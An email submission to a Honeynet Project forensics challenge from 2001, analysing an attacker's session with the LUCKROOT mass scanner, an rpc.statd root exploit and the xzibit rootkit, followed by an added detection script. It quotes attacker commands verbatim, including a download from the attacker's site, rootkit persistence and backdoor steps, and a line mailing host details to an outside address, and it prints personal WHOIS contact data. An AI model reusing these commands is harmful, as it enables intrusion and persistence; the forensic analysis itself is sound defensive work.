From Chad.Johnston@wcom.com Sat Mar 17 20:01:22 2001
Date: Fri, 02 Mar 2001 10:32:05 -0700
From: Chad Johnston
To: project@honeynet.org
Subject: Submission for March scan of the Month

Here is my submission for March's scan of the Month:

-----------------------------------------------------------------

1. What is the blackhat attempting to do with his command line syntax?

Change into a hidden directory:

    cd .mail
    cd /usr/sbin/.mail

Retrieve the scanning tool:

    lynx www.becys.org/LUCKROOT.TAR
    y

Untar (with a few tries to get the arg order correct):

    tar -xvfz LUCKROOT.TAR
    tar -xzvf Lu
    tar -xzvf L
    tar -xzvf LUCKROOT.TAR

Run the scanner/exploit against a number of targets. Each run specifies an A class and a B class subnet to scan. For example, the first scan will look at the first 1000 IPs in the range 216.210.0.0 to 216.210.255.255.

    cd luckroot
    ./luckgo 216 210
    ./luckgo 200 120
    ./luckgo 64 120
    .luckgo 216 200
    ./luckgo 216 200
    ./luckgo 200 120
    ./luckgo 63 1
    ./luckgo 216 10
    ./luckgo 210 120
    ./luckgo 64 1
    ./luckgo 216 1
    ./luckgo 194 1
    ./luckgo 216 1
    ./luckgo 210 128
    ./luckgo 24 1
    ./luckgo 12 20

-----------------------------------------------------------------

2. What does the tool accomplish?

This tool scans networks for systems running RedHat 6.0, 6.1, or 6.2 that have nfs-utils running. It then uses an rpc.statd exploit to gain remote root access. Once root access is gained, a rootkit (xzibit.tar.gz) is downloaded and installed onto the compromised server.

-----------------------------------------------------------------

3. How does the tool work?

The shell script, luckgo, is called with the IP value(s) of the systems to be scanned. If only one value is passed, the entire A-class subnet is scanned. For example, if ./luckgo 123 is entered, the scan will encompass the IP range 123.0.0.0 to 123.255.255.255 (well, not all of this range actually; examination of the code shows that a maximum of 1000 addresses are scanned). Luckgo takes additional arguments to narrow the scan down to B class and C class subnets as well.

The luckgo script then compiles the luckscan-a.c and luckstatdx.c sources and calls luckscan-a with the arguments supplied, plus the fixed argument of 111, whose purpose becomes clear when the code for luckscan-a.c and luckstatdx.c is examined.

Luckscan-a is a very simple port scanner. Depending on the arguments, an array of possible targets is built. For each IP address in this array a connection is attempted to port 111, the rpc port. If the connection succeeds, the IP address is passed on to luckstatdx to see if the system can be compromised. Luckscan is basically a simple wrapper to determine what addresses are possibly exploitable.

Luckstatdx is the guts of the exploit. It uses the well known rpc.statd exploit to connect to the system and attempt to gain remote root access. (I must confess to not knowing exactly how the statd exploit works. My knowledge of assembly seems to have suffered from severe bit rot since I last used it.) If the attempt succeeds, luckstatdx downloads xzibit.tar.gz and installs it onto the compromised system.

Xzibit.tar.gz is a nice little rootkit, and it performs some nice tasks as part of its installation process. Here is a summary of what happens (install script heavily snipped):

Replace system tools:

    echo -n "Replacing netstat, ps, ifconfig, top... "

Set up some bogus entries in /dev:

    echo -n "Setting up the /dev filez... "
    touch /dev/dsx
    touch /dev/caca

Create a directory for the backdoor:

    echo "Creating home... "
    mkdir -p /dev/ida/.inet
    echo "Copying SSHD and shit..."
    mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/
    touch /dev/ida/.inet/tcp.log

Install a new hdparm:

    echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
    echo >> /etc/rc.d/rc.sysinit
    mv hdparm -f /usr/bin/
    chmod 500 /usr/bin/hdparm
    chattr +i /usr/bin/hdparm
    /usr/bin/hdparm

Install a backdoor cgi script:

    if [ -d /home/httpd/cgi-bin ]
    then
        mv -f becys.cgi /home/httpd/cgi-bin/
    fi
    ...etc. for many different web servers...

Send an email confirming the install:

    touch /tmp/info
    /sbin/ifconfig | grep inet >> /tmp/info
    hostname -f >> /tmp/info
    uname -a >> /tmp/info
    cat /tmp/info | mail -s "becys rewting" becys@becys.org
    rm -f /tmp/info

One aspect of the rootkit install that jumps out at me is the becys.cgi program. Personally, I think it would make sense to use a name that's not going to be quite as suspicious. The cgi script itself has been compiled, but by examining the binary with a hex editor, the string "Command to Execute" can be seen, which indicates to me that this cgi is another backdoor way of allowing arbitrary commands to be executed on the compromised system.

------------------------------------------------------------------

4. Is this tool a worm, or would you classify it as something else?

This tool does not appear to be a worm, since it has no means of replicating itself across the network. It is simply a tool that allows for a mass attempt of a known exploit.

------------------------------------------------------------------

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

The shell script and luckscan-a are probably somewhat original, as they are wrappers to the actual exploit code. The exploit code luckstatdx, however, is not original. I found a version released in October of 2000 at http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html. Luckstatdx is nearly identical to this version. Using WinDiff, most of the changes can be attributed to things like multiple variables being declared on one line in one version, and separately in the other version. Of course, the most notable difference is the actual shellcode that is run once the exploit succeeds.

------------------------------------------------------------------

Bonus Question: What information can you obtain about who is using or created the tool?

The address www.becys.org resolves to the IP address 64.176.171.107. Arin.net claims that this IP range belongs to Alabanza, a web hosting company. Performing a WHOIS query on becys.org returns the following information:

    bSoft
    1 Hensel Dr. Apt.#Z1F
    College Station, Texas 77840
    US

    Domain Name: BECYS.ORG

    Administrative Contact:
        Qian Wang  becys@yahoo.com
        bSoft
        1 Hensel Dr. Apt.#Z1F
        College Station, Texas 77840
        US
        Phone- (979)862-9233

    Technical Contact:
        Web Site Source, In  info@websitesource.com
        Web Site Source, Inc.
        2476 Bolsover, Suite 484
        Houston, TX 77005-2518
        US
        Phone- 713-667-2520
        Fax- 800-863-6499

Interestingly enough, none of this information points to Romania. Of course, this doesn't mean that the Romanian blackhat community isn't involved.

-----------------------------------------------------------------

Resources:

    http://www.arin.net
        IP Lookup
    http://networksolutions.com/cgi-bin/whois/whois
        WHOIS Lookup
    http://crs.intrinsec.com/archive/bugtraq/bugtraq_1997_11/0228.html
        rpc.statd Solaris exploit
    http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html
        Statdx source code
    http://www.cs.berkeley.edu/idsg/security/redhat-rpc.statd.shtml
        Information about RedHat vulnerability
    http://project.honeynet.org/scans/scan10/job.txt
        More information about statdx exploit

------------------------------------------------------------------

Thanks!

Chad Johnston
Sunset Group Limited
(719) 535-6284
cjohnston@sunsetgroup.com
Chad.Johnston@wcom.com
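As an added example, not part of the submission above or of the tools it analyses: a POSIX shell function that inspects a filesystem tree for the artifacts the quoted xzibit install script leaves behind (the hidden directories, the bogus /dev entries, the line appended to rc.sysinit, the immutable hdparm and the becys.cgi backdoor). The paths are taken from the install script excerpt in the submission; the function name, its root-prefix argument and the output format are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the submission or from the rootkit itself.
# Inspects a filesystem tree for traces of the xzibit install script quoted
# in the analysis. Argument 1 is the root to inspect: "/" on a live host or
# the mount point of a suspect disk image (assumed interface of this example).
# Returns 0 when nothing is found, 1 when at least one artifact is present.

check_xzibit_artifacts() {
    root="${1:-/}"
    found=0

    # Hidden directories and bogus /dev entries created by the installer
    for p in /usr/sbin/.mail /dev/dsx /dev/caca /dev/ida/.inet \
             /dev/ida/.inet/tcp.log; do
        if [ -e "$root$p" ]; then
            echo "artifact: $p"
            found=$((found + 1))
        fi
    done

    # Persistence line the installer appends to rc.sysinit for its hdparm
    if grep -q 'hdparm -t1 -X53 -p' "$root/etc/rc.d/rc.sysinit" 2>/dev/null; then
        echo "artifact: hdparm line in /etc/rc.d/rc.sysinit"
        found=$((found + 1))
    fi

    # The installer runs chattr +i on its hdparm; a stock binary is not immutable.
    # lsattr may be absent or fail on some filesystems, so treat that as "no data".
    attrs=$(lsattr "$root/usr/bin/hdparm" 2>/dev/null || true)
    case "${attrs%% *}" in
        *i*) echo "artifact: /usr/bin/hdparm is immutable"
             found=$((found + 1)) ;;
    esac

    # Backdoor CGI dropped into whichever cgi-bin directory the installer found
    for cgi in $(find "$root" -xdev -name becys.cgi 2>/dev/null || true); do
        echo "artifact: $cgi"
        found=$((found + 1))
    done

    echo "artifacts found: $found"
    [ "$found" -eq 0 ]
}

# Run directly with a root prefix, e.g. ./check.sh /mnt/suspect
if [ "$#" -gt 0 ]; then
    check_xzibit_artifacts "$1"
fi
```

The function uses only find, grep and lsattr, none of which the install script replaces, but running it against a mounted image of the suspect disk is still preferable to trusting a live system whose netstat, ps, ifconfig and top have been swapped out.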